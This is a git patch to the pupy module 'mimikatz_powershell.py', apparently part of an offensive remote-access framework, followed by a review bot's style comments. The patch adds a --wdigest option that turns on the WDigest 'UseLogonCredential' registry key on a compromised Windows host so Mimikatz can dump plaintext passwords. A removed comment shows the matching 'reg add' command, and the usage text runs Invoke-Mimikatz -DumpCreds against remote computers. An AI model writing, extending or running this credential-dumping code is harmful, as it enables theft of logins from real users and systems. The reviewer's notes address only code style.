From 7aebdb55b6d9402934e5a3f648db3ce25143eb94 Mon Sep 17 00:00:00 2001
From: AlessandroZ
Date: Fri, 18 Nov 2016 18:17:50 +0100
Subject: [PATCH] managing wdigest key
---
 pupy/modules/mimikatz_powershell.py | 13 ++++++++++++-
 1 file changed, 12 insertions(+), 1 deletion(-)
diff --git a/pupy/modules/mimikatz_powershell.py b/pupy/modules/mimikatz_powershell.py
index 6b5886c2..d40cb0a7 100644
--- a/pupy/modules/mimikatz_powershell.py
+++ b/pupy/modules/mimikatz_powershell.py
@@ -4,6 +4,7 @@ import os
 import re
 from modules.lib.windows.powershell_upload import execute_powershell_script
 from pupylib.utils.credentials import Credentials
+from pupylib.utils.rpyc_utils import redirected_stdio
 __class_name__="Mimikatz_Powershell"
 ROOT=os.path.abspath(os.path.join(os.path.dirname(__file__),".."))
@@ -23,11 +24,21 @@ Invoke-Mimikatz -DumpCreds -ComputerName @("computer1", "computer2")
 Invoke-Mimikatz -Command "privilege::debug exit" -ComputerName "computer1"
 '''
 self.arg_parser = PupyArgumentParser(prog="Mimikatz_Powershell", description=self.__doc__, epilog=commands_available)
+ self.arg_parser.add_argument("--wdigest", choices={'check', 'enable', 'disable'}, default='', help="Creates/Deletes the 'UseLogonCredential' registry key enabling WDigest cred dumping on Windows >= 8.1")
 self.arg_parser.add_argument("-o", metavar='COMMAND', dest='command', default='Invoke-Mimikatz', help='command not needed')
 def run(self, args):
- # check if windows 8.1 or Win2012 => reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1
+ # for windows 10, if the UseLogonCredential registry is not present or disable (equal to 0), not plaintext password can be retrieved using mimikatz.
+ if args.wdigest:
+ self.client.load_package("pupwinutils.wdigest")
+ with redirected_stdio(self.client.conn):
+ ok, message = self.client.conn.modules["pupwinutils.wdigest"].wdigest(args.wdigest)
+ if ok:
+ self.success(message)
+ else:
+ self.warning(str(message))
+ return
 script ='mimikatz'
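Review bot: The new `--wdigest` argument passes `choices` as a set literal, so the order in which argparse prints the allowed values in `--help` and in its error message is not deterministic, and `default=''` is not itself one of the choices; `choices=['check', 'enable', 'disable'], default=None` gives stable help output and the later `if args.wdigest:` test keeps working. The comment introduced above that branch reads oddly: `disable` should be `disabled` and `not plaintext password` should be `no plaintext password`. The two result paths are also handled inconsistently, `self.success(message)` versus `self.warning(str(message))`; presumably the remote `wdigest()` returns a string either way, so both or neither should be stringified. `run` continues past the end of this hunk.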